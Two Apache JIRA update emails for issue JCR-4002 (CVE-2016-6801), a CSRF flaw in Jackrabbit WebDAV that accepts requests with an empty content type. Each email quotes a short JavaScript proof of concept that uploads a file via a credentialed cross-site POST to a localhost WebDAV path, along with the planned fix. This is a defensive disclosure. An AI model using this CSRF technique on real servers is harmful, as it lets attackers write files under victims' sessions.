[jira] [Updated] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)
[
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Julian Reschke updated JCR-4002:
Fix Version/s: 2.14
> CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
>Affects Versions: 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
> Labels: csrf, security, webdav
> Fix For: 2.13.2, 2.14
>
> Attachments: CVE-2016-6801.txt,
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
>
>
>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
>
>
>/>
>
>
>
> {code}
> I will mitigate this particular issue by including a null content type in the
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
[jira] [Updated] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)
[
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Julian Reschke updated JCR-4002:
Summary: CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)
(was: CSRF in Jackrabbit-Webdav using empty content-type)
> CSRF in Jackrabbit-Webdav using empty content-type (CVE-2016-6801)
> --
>
> Key: JCR-4002
> URL: https://issues.apache.org/jira/browse/JCR-4002
> Project: Jackrabbit Content Repository
> Issue Type: Bug
> Components: jackrabbit-webdav
>Affects Versions: 2.13.1
>Reporter: Dominique Jäggi
>Assignee: Dominique Jäggi
>Priority: Blocker
> Labels: csrf, security, webdav
> Fix For: 2.13.2
>
> Attachments: CVE-2016-6801.txt,
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
>
>
>
> function submitRequest()
> {
> var xhr = new XMLHttpRequest();
> xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
> xhr.withCredentials = true;
> var body = "This file has been uploaded via CSRF.=\r\n";
> var aBody = new Uint8Array(body.length);
> for (var i = 0; i < aBody.length; i++)
> aBody[i] = body.charCodeAt(i);
> xhr.send(new Blob([aBody]));
> }
>
>
>/>
>
>
>
> {code}
> I will mitigate this particular issue by including a null content type in the
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
